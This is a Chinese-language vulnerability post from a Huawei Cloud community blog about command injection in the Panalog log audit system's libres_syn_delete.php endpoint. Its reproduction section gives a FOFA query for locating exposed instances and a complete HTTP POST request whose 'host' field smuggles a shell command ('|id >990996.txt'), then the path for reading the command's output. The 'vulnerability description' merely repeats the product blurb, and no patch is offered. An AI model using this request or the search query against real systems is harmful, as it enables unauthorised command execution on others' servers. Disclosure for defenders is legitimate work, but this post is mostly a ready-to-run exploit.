Panalog大数据日志审计系统libres_syn_delete.php存在命令执行漏洞
【摘要】 Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
前言
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
一、Panalog大数据日志审计系统简介
panalog为一款流量分析,日志分析管理的一款软件。
二、漏洞描述
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
三、影响版本
Panalog大数据日志审计系统
四、漏洞复现
FOFA:app="Panabit-Panalog"
漏洞链接:https://127.0.0.1/content-apply/libres_syn_delete.php
漏洞数据包:
POST /content-apply/libres_syn_delete.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
token=1&id=2&host=|id >990996.txt
访问生成的文件路径: https://127.0.0.1/content-apply/990996.txt
五、整改意见
目前厂商尚未提供相关漏洞补丁链接,请关注厂商主页及时更新:https://www.panabit.com/
【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)